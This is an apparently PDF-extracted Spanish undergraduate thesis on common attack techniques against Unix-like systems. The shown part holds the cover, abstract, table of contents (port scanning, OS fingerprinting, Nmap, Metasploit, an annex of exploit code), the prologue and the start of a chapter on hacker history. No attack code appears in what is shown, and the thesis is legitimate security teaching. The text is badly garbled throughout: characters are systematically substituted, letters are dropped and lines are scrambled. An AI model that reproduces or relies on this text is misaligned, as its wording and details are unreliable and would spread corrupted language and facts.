Sei sulla pagina 1di 226

Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados

Autor: Marcelo Fidel Fernndez Director: Javier Blanqu

Universidad Nacional de Lujn Int. Ruta !" #"$$ Lujn% &uenos Aires Rep'(lica Ar)entina A*o +$$,

Esta obra est licenciada bajo una Licencia Atri(uci-n.No /omercial. /ompartir 0(ras Derivadas I)ual 2.5 Argentina de Creative Co ons. !ara ver una co"ia de esta licencia# visite $tt"%&&creativeco ons.org&licenses&b'( nc(sa&2.5&ar& o env)enos una carta a Creative Co ons# *+* ,econd ,treet# ,uite -..# ,an Francisco# Cali/ornia# 01*.5# 2,A.

Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados

1arcelo 2ernnde3 Universidad Nacional de Lujn Int. Ruta !" #"$$ Lujn% &uenos Aires Rep'(lica Ar)entina arcelo./idel./ernandez3g ail.co

"Si la depuracin es el proceso de eliminar errores, entonces la programacin debe ser el proceso de introducirlos" Edsger 4. 5ij6stra

Resumen
El "resente trabajo trata de brindar un "anora a acerca de las tcnicas s co unes de obtenci8n de in/or aci8n re ota en /or a activa ' "asiva# detecci8n de vulnerabilidades ' "osterior ente una introducci8n al ataque en entornos ti"o 2ni9# co o :inu9 ;5ebian# 2buntu# <ed =at# Fedora# ,use# Mandriva# etc.># B,5 ;FreeB,5# ?"enB,5# @etB,5># ,olaris# A7A# =!(2A# ,C? 2ni9# etc. En el !ri er Ca")tulo se $ace una reseBa de la $istoria del Movi iento =ac6er# una co unidad nueva e interconectada# surgida al junto al desarrollo de la in/or tica nuestros d)as# is o tie "o que ' is a. :uego se describen los diversos

/actores tecnol8gicos ' circunstancias adicionales que alteraron su recorrido $asta o ento en que se "odr)a decir que est en todo su es"lendor. ,eguido de esto# se describe un "oco la situaci8n global de la C,eguridad 7n/or ticaD $o' en d)a# su relaci8n con la Etica =ac6er ' la "rctica del =ac6ing Etico co o una /or a de vida dentro de la Co unidad =ac6er. En el Fercer Ca")tulo se "lantean un conjunto de eta"as co o t)"icas# o que nor al ente se llevan adelante# antes ' des"us de e/ectuar un ataque a la seguridad in/or tica de una organizaci8n# con el /in de que tenga "robabilidades de 9ito "ri ero ' "resenta la "ri era ' a9i izar las consecuencias luego. a'ores

:os ca")tulos siguientes "oseen una neta orientaci8n tcnica. El Cuarto s e9tendida /or a de reco"ilaci8n activa de in/or aci8n s re ota% el Cescaneo de "uertosD o CPort ScanningD. ,e introducen una serie de variantes o ti"os de escaneo# los cuales se encuentran en la $erra ienta que se inclu'en ca"turas del tr/ico de la red a odo de eje "lo. "o"ular# @ a"# detallando el /unciona iento te8rico ' "rctico de cada una# 'a El Ca")tulo 5 e9"lica otras /or as de reconoci iento re oto# co o ser la detecci8n de un ,iste a ?"erativo en base a su "ila de "rotocolos FC!&7!# lla ado ?, Finger"rinting# en su versiones activa# "asiva ' otras utilizadas. Fa bin se desarrollan algunas tcnicas aGn Enu eraci8n de ,ervicios ' el Finger"rinting de A"licaciones. El ,e9to Ca")tulo recorre algunas $erra ientas "ara a"licar ' a "liar aGn s la teor)a de los dos ca")tulos anteriores% @etcatH o"ciones avanzadas de @ a" co o su otor de scri"tingH "ort scanners alternativos co o 2nicornscan ' uestra de las ,canrand# ' un packet crafter co o ="ing es s8lo una in/or ticos.
77

enos

s intrusivas# co o la

"osibilidades que tienen los intrusos ;legales o no> /rente a los siste as

!or Glti o# el Ca")tulo + /inal ente describe el ataque ' acceso a un equi"o re oto# ade s de $acer una introducci8n un so/tIare es"ecial ente creado "ara el desarrollo ' creaci8n de e9"loits# lla ado Metas"loit Fra eIor6. :a utilidad del Ane9o A se reduce en tener a objetivo de re/rescar la ano la docu entaci8n s i "ortante de los "rotocolos con los que se trabaja% 7!# FC!# 25! e 7CM!# con el e oria en caso de duda o desconoci iento "or "arte del lector. El Ane9o B describe con bastante detalle ' "recisi8n las ca"turas realizadas ' utilizadas en los Ca")tulos 1 ' J. El Ane9o C se des"rende ' "ro/undiza un "oco s el Ca")tulo 5# abriendo las "uertas a la colaboraci8n con el "ro'ecto @ a" cuando no reconoce una /ir a de un ,?H de "aso# ta bin sirve co o re/erencia de bajo nivel sobre qu "ar etros son Gtiles "ara la detecci8n activa de un stac6 FC!&7! re oto. El Ane9o 5 "er ite obtener s detalles sobre los e9"loits utilizados en el Ca")tulo +. K el Ane9o E es un co "endio de los tr inos# siglas ' acr8ni os utilizados# e9"licando su signi/icado ' o/reciendo las re/erencias corres"ondientes. 4ala(ras /laves: ,eguridad# :inu9# 2ni9# ,eguridad de la 7n/or aci8n# =ac6ing# Crac6ing# E9"loits# Finger"rinting# !ort ,canning

777

A)radecimientos
Agradezco "ro/unda ente a toda la gente que grati/icante ca ino de estudiante universitario. e rode8 durante estos aBos

de estudio% /a ilia# docentes# a igos ' co "aBeros con los que recorr) el largo '

7L

5ndice de /ontenido
<esu en..........................................................................................................!g. 77 Agradeci ientos............................................................................................!g. 7L !r8logo...........................................................................................................!g. 7A Ca")tulo *. 7ntroducci8n e =istoria de los $ac6ers..........................................!g. * *.*. :os !rogra adores Cde LerdadD..........................................................!g. * *.2. :os dorados MJ. ( El co ienzo de la cultura $ac6er.............................!g. 2 *.-. :os aBos M+. N :a Cultura de las !5!(*..............................................!g. 5 *.1. A"arecen 2ni9 ' las *.5. :as inico "utadoras...............................................!g. J icroco "utadoras% Co "utadoras !ersonales..........................!g. **

*.J. :os aBos MO.# M0. ' el F:?,,............................................................!g. ** Ca")tulo 2. El Ataque de siste as in/or ticos............................................!g. *1 2.*. El @egocio de la ,eguridad en la Actualidad.....................................!g. *1 2.2. El =ac6ing Etico................................................................................!g. *1 Ca")tulo -. Eta"as F)"icas de un Ataque.......................................................!g. *+ -.*. !lani/icaci8n ' elecci8n del objetivo..................................................!g. *O -.2. ?btenci8n de in/or aci8n..................................................................!g. *O -.2.*. 5esde /uera de la organizaci8n...................................................!g. *0 -.2.2. 5esde dentro de la organizaci8n.................................................!g. 2. -.2.-. 7ngenier)a ,ocial.........................................................................!g. 2* -.-. BGsqueda ' rastreo de vulnerabilidades.............................................!g. 22 -.-.*. Acceso :ocal..............................................................................!g. 22 -.-.2. Acceso <e oto. Enu eraci8n de ,ervicios...............................!g. 2-.1. Buscando el Anoni ato en la red.......................................................!g. 2J -.1.*. <edes ' ,iste as An8ni os.......................................................!g. 2J -.1.2. 2tilizaci8n de MalIare...............................................................!g. 2+ -.5. Ataque e 7ntrusi8n..............................................................................!g. 2O -.5.*. Ma"eo de Lulnerabilidades........................................................!g. 2O -.5.2. E9"lotaci8n e intrusi8n...............................................................!g. -. -.J. !uertas traseras ' Eli inaci8n de $uellas..........................................!g. -* -.+. Atacar otro siste a.............................................................................!g. -* Ca")tulo 1. !ort ,canning..............................................................................!g. -1.*. Mtodo de Funciona iento ' ?bjetivos............................................!g. -1.2. Estados de un !uerto..........................................................................!g. -1
L

1.2.*. !uerto Abierto ;C?"en !ortD>.....................................................!g. -1 1.2.2. !uerto Cerrado ;CClosed !ortD>..................................................!g. -J 1.2.-. !uerto Filtrado o Bloqueado ;CFilteredD>...................................!g. -O 1.-. Fi"os de !ort ,canning en @Ma".......................................................!g. 1. 1.-.*. ,'n ,can.....................................................................................!g. 1* 1.-.2. Connect ,can..............................................................................!g. 12 1.-.-. Ac6 ,can.....................................................................................!g. 11 1.-.1. 4indoI ,can..............................................................................!g. 1+ 1.-.5. 25! ,can....................................................................................!g. 1+ 1.-.J. Mai on# @ull# Fin ' A as ,can................................................!g. 1O 1.-.+. 7dle ,can.....................................................................................!g. 5* 1.-.O. FF! Bounce ,can.......................................................................!g. 5O 1.-.0. Escaneo de !rotocolos 7!............................................................!g. J1 1.-.*.. Fi"os de escaneo% <esu en......................................................!g. J5 Ca")tulo 5. ?tras Fcnicas de <econoci iento Activo.................................!g. JJ 5.*. 5etecci8n del ,iste a ?"erativo% ?, Finger"rinting........................!g. JJ 5.*.*. 5etecci8n Activa........................................................................!g. JJ 5.*.2. 5etecci8n !asiva.........................................................................!g. +2 5.*.-. ?tras tcnicas de Finger"rinting.................................................!g. +5 5.2. Enu eraci8n de ,ervicios..................................................................!g. ++ 5.2.*. Banner Prabbing.........................................................................!g. ++ 5.2.2. Finger"rinting de A"licaciones...................................................!g. +0 5.2.2.*. A a"...................................................................................!g. O. 5.2.2.2. @ a"...................................................................................!g. OCa")tulo J. ,o/tIare "ara <econoci iento Activo........................................!g. O+ J.*. @etcat..................................................................................................!g. O+ J.2. @ a" N Ms ?"ciones.......................................................................!g. 02 J.2.*. 5eco's ;o C,eBuelosD>................................................................!g. 02 J.2.2. Evitando FireIalls......................................................................!g. 01 J.2.-. 7nter/az Pr/ica ( Qen a"..........................................................!g. 0J J.2.1. Motor de ,cri"ting%.....................................................................!g. 0+ J.-. 2nicornscan......................................................................................!g. *.. J.1. ,canrand...........................................................................................!g. *.2 J.5. Mani"ulaci8n de !aquetes% ="ing....................................................!g. *.5 Ca")tulo +. E9"lotaci8n de un ?bjetivo.......................................................!g. **2
L7

+.*. El !ro'ecto Metas"loit.....................................................................!g. **1 +.*.*. Esque a de Funciona iento....................................................!g. **5 +.*.2. Arquitectura ' Co "onentes....................................................!g. **+ +.*.-. 7nter/aces de 2suario................................................................!g. *2* +.2. Eje "los de Ataques con E9"loits...................................................!g. *25 +.*.*. Atacando ,a ba con Metas"loit..............................................!g. *25 +.*.2. E9"lotando un ,ervidor FF!....................................................!g. *2O +.-. Enlaces 2tiles...................................................................................!g. *-. Ane9o A. !ila de !rotocolos FC!&7!...........................................................!g. *-2 A.*. !rotocolo 7!v1 ( Encabezado..........................................................!g. *-2 A.2. !rotocolo FC! N Encabezado%.........................................................!g. *-A.-. !rotocolo 25! N Encabezado.........................................................!g. *-1 A.1. !rotocolo 7CM! N Encabezado........................................................!g. *-5 A.5. FC! N 5iagra a de Fransici8n de Estados.....................................!g. *-J Ane9o B. Acerca de las Ca"turas de Fr/ico...............................................!g. *-+ B.*. ,cri"ts "ara !rocesar las Ca"turas...................................................!g. *-+ B.2. :as Ca"turas en 5etalle...................................................................!g. *1. B.2.*. Ca"tura *% !uerto Abierto........................................................!g. *1. B.2.2. Ca"tura 2% !uerto Cerrado........................................................!g. *1* B.2.-. Ca"tura -% !uerto 25! Cerrado...............................................!g. *1* B.2.1. Ca"tura 1% !uerto Filtrado........................................................!g. *1* B.2.5. Ca"tura 5% Connect ,can..........................................................!g. *12 B.2.J. Ca"tura J% ACR ,can...............................................................!g. *12 B.2.+. Ca"tura +% ACR ,can Filtrado.................................................!g. *1B.2.O. Ca"turas O% Fin# Mai on# @ull ' A as ,cans.........................!g. *1B.2.O.* Fin ,can.............................................................................!g. *1B.2.O.2 Mai on ,can.....................................................................!g. *11 B.2.O.- @2:: ,can........................................................................!g. *11 B.2.O.1 A as ,can.........................................................................!g. *15 B.2.0. Ca"tura 0 a **% 7dle ,can.........................................................!g. *1J B.2.*.. Ca"tura *-% FF! Bounce ,can...............................................!g. *5* B.2.**. Ca"tura *1% FF! Bounce Err8neo..........................................!g. *5J B.2.*2. Ca"tura *1B% 7! !rotocol ,can..............................................!g. *50 B.2.*-. Ca"tura *5% ,K@ ,can con 5eco's.......................................!g. *JO B.2.*1. Ca"tura *J% Covert C$annel 7CM!........................................!g. *+2
L77

Ane9o C. Anlisis de una /ir a FC!&7!......................................................!g. *O5 Ane9o 5. C8digo /uente de los E9"loits 2tilizados....................................!g. *O0 Ane9o E. Plosario de Fr inos...................................................................!g. *02 Bibliogra/)a..................................................................................................!g. *05

L777

!r8logo

4r-lo)o
Este trabajo surge co o consecuencia del grn inters que tengo "or la seguridad in/or tica "or un lado ' la ad iraci8n $acia la co unidad $ac6er "or el otro. =o' en d)a# 7nternet "er ite que una gran asa de "ersonas# entusiastas de las Cnuevas tecnolog)asD# vuelquen in/or aci8n e interactGen con ella en /or a constante e ininterru "ida# gracias a los "rogra as de so/tIare. !ero la entable ente# son "ocos los que re/le9ionan que este nuevo de co unicaci8n es di/erente a los de s# "ara bien ' "ara cada vez necesitan de de /or a edio al. :os errores de

"rogra aci8n que antes s8lo "rovocaban "roble as aqu) ' all en /or a aislada# a'or cuidado# 'a que su dise inaci8n crece en /or a s so/tIare# "ara s consu idores# ' s di/)ciles de anejo global ' e9ageradaH cada vez se escribe s integrada con la red.

:os es/uerzos "or detener los "roble as son cada vez

costear# sobrellevar ' a/rontar# ' en consecuencia# $o' e9iste todo un gran ercado global ;l)cito ' del otro> alrededor de las vulnerabilidades en el de la in/or aci8n de esa gran asa.

Es "or esto que creo que no es casual el enor e creci iento del ,o/tIare :ibre ;F:?,,> en estos Glti os aBos. ,u /unda ento en la C/iloso/)a $ac6erD# su de/ensa de los estndares abiertos# ' la de/ensa de los derec$os del usuario en el anejo de la in/or aci8n est e9"andindose co o alternativa# /rente a un odelo que co o est quedando de ostrado# tiene uc$as /allas. s co unes "ara Este trabajo es un breve recorrido de los "rocedi ientos

analizar "ri ero ' a"rovec$arse des"us de estos errores# ca ino que los $ac6ers $an sabido transitar ' desarrollar en /or a e9clusiva# con el objetivo de /o entar la inacabable cultura del conoci iento.

Aclaraci-n% :as tcnicas de ataque e9"uestos en este trabajo son s8lo una reco"ilaci8n a ?rganizaciones# Entidades ' E "resas "ueden o no contener datos ver)dicos o del cu'o caso a/ir ativo ser aclarado o"ortuna ente.

odo de

eje "lo ' no "retenden ser co "letos. :a in/or aci8n "resentada co o "roveniente de undo real# en

7A

Ca")tulo *. ( Ca")tulo *. 7ntroducci8n e =istoria de los $ac6ers

/ap6tulo 7. Introducci-n e 8istoria de los 9ac:ers


*.*. :os !rogra adores Cde LerdadD
:a $istoria de los $ac6ers se re onta a "rinci"ios de la dcada de *05.# en la "re$istoria de la co "utaci8n# con el surgi iento de los CProgramadores de VerdadDSE<==T. Estos e9"ertos# "rovenientes de corrientes acad icas co o la /)sica# ingenier)a ' $asta algunos radioa/icionados# se dese "eBaban co o "rogra adores intensa ente a"asionados ' entusiastas de las ciencias de la co "utaci8n# sobre las "ri eras co "utadoras digitales. Estas donde co "utadoras $abitaban en in ensos salones quinas co o la E@7AC
2

;con *J+ en *01J># segundo*#


S47R7UE@T

# 2+ Foneladas ' *5. realizaban unos 5... "ara ;ver


2

R4 de consu o# dada a conocer clculos si "les ;su a ' resta> "or uso 7lustraci8n ilitar *>.
7lustraci8n * ( Co "utadora E@7AC

!osterior ente# la 2@7LAC 7 ;ocu"aba -5 # lanzada al

ercado en *05*># "ri era co "utadora digital is os creadores de la

estadounidense de uso co ercial# /ue el /ruto de los

anterior# Jo$n Mauc$l' ' Jo$n !res"er Ec6ert# sta s)# dando co ienzo a una ola de aconteci ientos que ter inar)an en la co "utaci8n tal co o la conoce os.

7lustraci8n 2% :)nea de Fie "o ( !rogra adores de Lerdad * !ara dar una idea de su velocidad de clculo# un "rocesador de !C reciente ;"or eje "lo un 7ntel Core 2 Vuad de - P=Q># "uede realizar decenas de segundo. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. * de 22O iles de illones de o"eraciones "or

Ca")tulo *. ( *.*.:os !rogra adores Cde LerdadD

5ic$as

quinas eran e9cesiva ente grandes# lentas ' "esadas. :a entrada edio de tarjetas "er/oradas# que $ac)a que los centros

de datos deb)a $acerse "or

de c8 "utos ar aran largas CcolasD de "rogra as a ejecutarH si el "rogra a /allaba# el "rogra ador deb)a arreglar el "roble a ' volver a la CcolaD. Esto $ac)a u' burocrtico ' di/)cil el acceso real a la co "utadora# lo cual desani aba ' quitaba entusias o de utilizarlas al co Gn de los "rogra adores# cient)/icos ' acad icos. A "esar de ello# en estos "ri eros "asos de la co "utaci8n# programadores de verdad co o los creadores de la E@7AC ' la 2@7LAC# o ta bin ,e' our Cra'2# comen3aron a desarrollar una incipiente cultura propia# con ter inolog)as# que se re/lej8 "or eje "lo en varias largas listas de C:e'es de Mur"$'D S47R7UM!=KT .

*.2. :os dorados MJ. ( El co ienzo de la cultura $ac6er


:a cultura $ac6er tiene sus ra)ces en el M7F# s "recisa ente en la uc$a subco isi8n de ,eBales ' Energ)a del Club Fecnol8gico de Modelos de Frenes -. Algunos de los integrantes de dic$o subco it eran "ersonas de inteligencia# ca"acidad ' talento# que a aban a"render cada vez "ri eras co "utadoras que "od)an ec$ar s de todo

aquello que les interesara# "or "ura diversi8n ' curiosidad# desde aquellas ano $asta conocer al dedillo el siste a tele/8nico del edi/icio# aGn a costa de sus relaciones sociales ' "ersonales. !ri ero con la FA(. S47R7UFA.T# ' luego ta bin en *0J*# cuando la instituci8n adquiri8 la "ri er !5!(*# dic$os estudiantes ;Bob ,aunders# !eter ,a son# Alan Roto6# ' otros># convirtieron estas quinas ' sus sucesoras de la l)nea !5! S47R7U!5!T de 5EC1 en su "asatie "o "re/erido# donde desarrollaron so/tIare# $erra ientas de "rogra aci8n# un lenguaje in/or al# "ro"io# ' "or /in# una cultura% con tica ! c-di)os# cu'a $uella deja su :a arca $asta nuestros d)as. a'or)a de los tr inos originados en esta "oca estn registrados en el

2 ,e' our Cra' ;*025(*00J> /ue un "ionero de la in/or tica# ' es considerado el C!adre de la ,u"erco "utaci8nD. !as8 su vida diseBando equi"a iento co "utacional a grandes escalas# ' es el inventor de un gran nG ero de tecnolog)as "atentadas "ara las e "resas que l trabajaba. :uego de un dese "eBo brillante en stas# /und8 Cra' Cor"oration en *0+2# la "rinci"al /ir a /abricante de su"erco "utadoras durante dos dcadas ' 1 !5! de 5EC% !rogra edia. SC<AKT S?BUC<AKT itee. - FM<C N Fec$ Model <ailroad Club# ,ignals and !oIer Co

ed 5ata !rocessor# de 5EC N 5igital Equi" ent Cor"oration.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2 de 22O

Ca")tulo *. ( *.2.:os dorados MJ. ( El co ienzo de la cultura $ac6er

Jargon File5 SE<JFT # un docu ento que "retende reco"ilar el signi/icado del slang# o lenguaje e9clusiva ente $ac6er. El tr ino hacker "roviene de esta eta"aH si bien original ente quiere decir Calguien quien $ace $ac$aD# se encuentra aqu) SE<JF=T descri"to co o% 7. C2na "ersona que dis/ruta e9"lorar los detalles de los siste as ' e9"ri ir sus ca"acidades# al contrario de la a'or)a de sus usuarios.D +. CAlguien que "rogra a de /or a entusiasta ;$asta obsesiva>.D ;. C2na "ersona ca"az de a"reciar el valor del $ac6eo.D <. C2na "ersona que es buena "rogra ando r"ida ente.D . C2n e9"erto en un "rogra a en "articular# o alguien que /recuente ente trabaja con l o en lH co o "or eje "lo# un Hacker UnixD. #. C2n e9"erto o entusiasta de cualquier ti"oH alguien "uede ser un $ac6er de la astrono )a# "or eje "lo.D ". CAlguien que dis/ruta el desa/)o intelectual de su"erar o sortear las li itaciones de /or a creativaD. ,. CEl tr ino acker ta bin tiende a connotar a$ora>. Co o se "uede ver# un di/undida entre la gente "or los acker nada tiene que ver con la visi8n edios s asivos de co unicaci8n# la del Cladr8n s bien relacionadas con el uso s di/usa e bres)a en la co unidad global de/inida "or la redD ;re/irindose a A<!A@et "ri ero e 7nternet uebles con un

cibernticoD# que dis/ruta ingresando a siste as sin "er iso "ara robar datos. ,i bien un $ac6er dis/ruta de $acer cosas que estn no co Gn de los siste as# o considera los l) ites legales de una /or a sus ecanis os de seguridad "ara luego

o CrelajadaD ;s8lo "orque es bueno saber todos los detalles de un siste a ' sortear ejorarlos># la intenci-n del 9ac:er no es ro(ar in=ormaci-n o causar da*o al)uno . !ara aquellos que s) lo $acen# los $ac6ers inventaron otro tr ino% cracker. !ara /inalizar# dada la de/inici8n de acker# <a' ond escribe% C=a' una co unidad# una cultura co "artida de "rogra adores e9"ertos ' agos de las redes in/or ticas que recorren la $istoria $acia atrs varias dcadas# $asta la "ri er co "utadora de tie "o co "artido ' los "ri eros e9"eri entos de la A<!A@et. :os ie bros de esta cultura dieron origen al tr ino M$ac6erM. :os $ac6ers constru'eron la 7nternet. :os $ac6ers $icieron el siste a o"erativo 2ni9
5 F$e Jargon File% El CArc$ivo de la JergaD. Fa bin deno inado CEl 5iccionario =ac6erD. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. - de 22O

Ca")tulo *. ( *.2.:os dorados MJ. ( El co ienzo de la cultura $ac6er

lo que es $o'. :os $ac6ers ejecutaron la 2senet. :os $ac6ers $icieron la 4orld 4ide 4eb /uncionar. ,i usted es "arte de esta cultura# si usted contribu'8 a ella ' otras "ersonas en ella saben quin es usted ' lo lla an un $ac6er# entonces# usted es un $ac6er.D SE<B=T Lolviendo a esta !poca dorada de los ackers SEB=:T# $a' que re arcar que s-lo =ue movili3ada ;' $asta "osible> por nota(les cam(ios en la tecnolo)6a de la co "utaci8n. Co o se dijo anterior ente# $asta ese donde "rogra arlas era bastante tedioso# 'a que una "rogra a escrito ;en un lenguaje de o ento las co "utadoras eran utilizadas "ara ejecutar inter inables "rocesos "or lotes# )ni a equivocaci8n en el quina u' bajo nivel> $ac)a que todo el

"rocedi iento /allara. Cuando a"areci8 la FA(. ;la "ri era

transistorizada# una de las "ri eras con una salida en /or a de i agen SCMUFA.T> ' las "ri eras co "utadoras !5! de 5EC# todo ca bi8# 'a que estas co "utadoras "ro"on)an una o"eraci8n ms interactiva# que "od)an CtocarD ;ten)a una quina de escribir elctrica ada"tada "ara entrar datos a la quina>. As) ' todo# la e9igua cantidad de con que contaban estas ingenio "ara lograr ejores "rogra as con e oria ' ca"acidad de "rocesa iento u' "ocos recursos dis"onibles. Es as)

quinas# $ac)a que los "rogra adores a"licaran todo su

co o nacieron los "ri eros acks ;no olvide os que se buscaba CrecortarD o >9ac9ar? el consu o de Co o estas "ri eras e oria '&o "rocesa iento> en los "rogra as ' luego# quinas de c8 "uto# el ovi iento e inters "or el tr ino acker /ue i "onindose "or decantaci8n. ellas se e9"andi8 ' no s8lo tuvo su es"lendor en el A7:ab del M7F# sino ta bin en la 2niversidad de ,tand/ord ;,A7:J> ' en la Carnegie(Mellon+# donde se /or aron ABos s centros de cultura $ac6er e investigaci8n. s tarde# con la creaci8n de la red de co unicaciones A<!A@et

;*0J0># estos centros de investigaci8n# original ente divididos# co enzaron a uni/icarse# a tener conciencia "ro"ia ' =uncionar como una comunidad% como una >tri(u?. Esto los /ortaleci8 aGn avances tecnol8gicos "er anente ente. El interca bio de in/or aci8n# el trabajo en conjunto entre laboratorios ' universidades $izo que todo el ovi iento en s) se "otenciara en las siguientes s ' "ro/undiz8 su alcance# logrando

J ,A7:% ,tand/ord Arti/icial 7ntelligence :aborator'. + CM2% Carnegie(Mellon 2niversit'. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1 de 22O

Ca")tulo *. ( *.2.:os dorados MJ. ( El co ienzo de la cultura $ac6er

dcadas. Todo el so=t@are que escri(6an% el conocimiento que pose6an% todo era compartido% modi=icado ! mejorado a travs del li(re intercam(io de in=ormaci-n. Tanto el so=t@are como los conocimientos eran li(res . Fa bin dio origen a actividades lGdicas relacionadasH las "ri eras listas de c$istes# lenguaje slang# discusiones ticas# el inters "or la ciencia /icci8n# todo eso ' /loreci8 natural ente "or la red que los conectaba. s

*.-. :os aBos M+. N :a Cultura de las !5!(*.


A edida que la sociedad de los $ac6ers ' e9"ertos de la co "utaci8n u' inico "utadoras !5! de 5EC OS5EC(4EBT quinas enor es># al ser uc$o s evolucionaba# la tecnolog)a ta bin los aco "aBaba a la "ar% ellos estaban unidos e identi/icados con la serie de
S!5!U!:AT.

Estas

quinas ;que no se lla aban Cco "utadorasD "orque en ese interactivas# /ueron adquiridas "or

entonces se asociaba ese tr ino con c$icas# "otentes# relativa ente baratas e

uc$)si as universidades ;ver 7lustraci8n -# SE<==T# "g. ->.

7lustraci8n -% !ri er

odelo de la !5!(*.# en su con/iguraci8n

s co "leta.SC2=7T

Es "or esto que las !5! ' sus $ac6ers Cco"aronD la A<!A@etH siendo la cultura de la !5!(*. S!5!*.(!<MTS!5!*.(4ebT la enor edida las !5!(+ ' !5!(O>. s relevante de esa "oca ;' en

Es entonces donde los distintos ;"ero interconectados> nGcleos de actividad $ac6er ' sus !5!(*. co enzaron a interesarse "or di/erentes l)neas de
O 5EC% 5igital Equi" ent Cor"oration Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5 de 22O

Ca")tulo *. ( *.-.:os aBos M+. N :a Cultura de las !5!(*.

investigaci8n ' desarrollo de la co "utaci8n%

El A7:ab del M7F desarroll8 un siste a o"erativo alternativo "ara el !5!( *. deno inado ITA ;7nco "atible Fi es$aring ,'ste
S47R7U7F,T>#

di/erencia del que integraba 5EC ;el F?!,(*. S47R7UF?!,*.T># ' ten)a un objetivo claro% desarrollar ' utilizar dentro del laboratorio un siste a de tie "o co "artido "ro"io# a9i izando la e/iciencia del $ardIare ' los usuariosS7F,UM7FT. Ade s de $acer las cosas Ca su /or aD# este siste a o"erativo "er iti8 que los $ac6ers del M7F desarrollaran una serie de avances sin "recedentes% el editor E acs# el lenguaje :7,!# ' innovaciones revolucionarias en el 7F, re otos# is o# uc$as s avanzado res"ecto de

otros ,iste as ?"erativos de aquel entonces# co o ,iste as de arc$ivos anejo de "rocesos so/isticado# so"orte de tie "o real # etc. Fodo este conoci iento te8rico ' trabajo de aBos /ue llevado a uc$)si os siste as# ' "er anece en uso $asta $o' en d)aH sin e bargo# el 7F, en s) estaba escrito en lenguaje de !5!(*.# ' estaba atado a su destino.

quina ;asse bler> "ara la

:os $ac6ers del ,A7: /ueron claves en el desarrollo de lo que $o' es la co "utadora "ersonal ' en la inter/az de so/tIare orientada a la ventana&)cono& ouse. S,A7:UM2,T En el CM2 ientras tanto# se llevaron adelante los "ri eros siste as

e9"ertos ' robots con destino industrial.

Fa bin /ueron i "ortantes los avances logrados "or los $ac6ers del !A<C0SA!A<C4EBT%

El

ouse# la inter/az del so/tIare orientado a CventanasD.

:a i "resora lser. :as redes de rea local. Muc$o s# ta bin re/erente a las co "utadoras "ersonales de $o'.

*.1. A"arecen 2ni9 ' las

inico "utadoras

Mientras en *0J0 la A<!A@et nac)a# Ren F$o "son e "ez8 a "rogra ar "ara Bell :abs un siste a o"erativo que "oco a "oco /ue ree "lazando en cuanto a /uncionalidades al 1ultics S47R7UM2:T. El desarrollo de Multics /ue iniciado en *0J5# ' ten)a co o objetivo ser Cun sistema de computacin de tiempo
0 !A<C% !alo Alto <esearc$ Center N Aero9 7nc. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J de 22O

Ca")tulo *. ( *.1.A"arecen 2ni9 ' las

inico "utadoras

compartido para mainframes, robusto, interactivo, siempre en l"nea, para cual#uier finalidad, #ue pudiera soportar muc os usuarios a la ve$ D ;' /inanciaban el "ro'ecto*. no alcanz8 los objetivos deseados# ' de esa cancelado en abril de ese aBo SM2:UF7METSM2:U=7,T. El resid)a en su costo% Multics era u' altos**. Ren conoc)a bien al Multics ;/ue "arte de su equi"o de trabajo> ' si bien en "ri era instancia se "ro"uso s8lo crear un siste a de arc$ivos "ara su
*2

objetivos aGn# ver SM2:U7@F<?TSBE::T>. !ero "ara las organizaciones que anera /ue otivo de dic$a decisi8n

u' co "lejo ' sus requeri ientos de $ardIare

anejo en s

la cinta de "a"el de la !5!(+# "oco a "oco /ue i "le entando $erra ientas "ara "oder ejecutarse a s) is o# etc.

/uncionalidades "ro"ias de un siste a o"erativo co "leto% un s$ell # un editor# Cuando se le uni8 5ennis <itc$ie el "ro'ecto cobr8 i "ulso ' luego Brian Rernig$an# otro gran colaborador# le "uso el no bre Unix en clara re/erencia a la co "lejidad de Multics*- ' la "roble as. Al "oco tie "o el gru"o de desarrollo obtuvo una /la ante !5!(** S!5!**(
=BRT#

anera si "le de 2ni9 "ara resolver los

is os

' co enzaron el trabajo de "ortar 2ni9 a este $ardIare# co o $erra ienta

de desarrollo e investigaci8n. :a "ri era versi8n de 2ni9 /ue escrita en lenguaje ensa blador# "ero la clave del gran 9ito "osterior de este siste a o"erativo se bas8 en que su c8digo /uente /ue reescrito en el lenguaje C# creado es"ec)/ica ente "ara esta tarea. 5esde que co enz8 su /abricaci8n# cada versi8n de la serie !5! tuvo di/erentes arquitecturas# juegos de instrucciones# ' di/erentes objetivos dentro del ercado. En "articular# las !5!(*. ' !5!(**# si bien sus no bres sugieren que uno era un diseBo evolutivo del otro# en realidad# eran completamente di=erentes% uno era de -J bits ' el otro de *J bits# res"ectiva ente# ' sus arquitecturas eran u' distintas. Es "or eso que la elecci8n de "ortar 2ni9 a la uc$o des"us# co o se ver s adelante. !5!(** tuvo sus consecuencias

*. Financiaban el "ro'ecto de Multics% Bell Fele"$one :abs# el !ro'ecto MAC del M7F ' el de"arta ento de co "utaci8n de Peneral Electric. ** AGn as)# Multics sigui8 siendo desarrollado# i "le entado ' utilizado "or *2 Ler Plosario% ,$ell# "g. 2*2. *- :a 2 de 2ni9 se dice que "roviene de Cuni"le9adoD o CGnicoD# en clara o"osici8n a C ulti"le9adoD de Multics S47R7UM2:T Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. + de 22O uc$os aBos s.

Ca")tulo *. ( *.1.A"arecen 2ni9 ' las

inico "utadoras

A esta altura ;segunda

itad de la dcada del M+.># la A<!A@et era

uc$o s de

s e9tensa que al co ienzo# un)a universidades# centros de investigaci8n ' entidades estatales de EE22H en tr inos de $ardIare# era un conjunto de *.. co "utadoras ;*** en arzo de *0++# ver 7lustraci8n 1> SA<!AUFF7T# la

a'or)a !5!(*. ' !5!(**. Fen)a varias a"licaciones ' "rotocolos estndar# co o

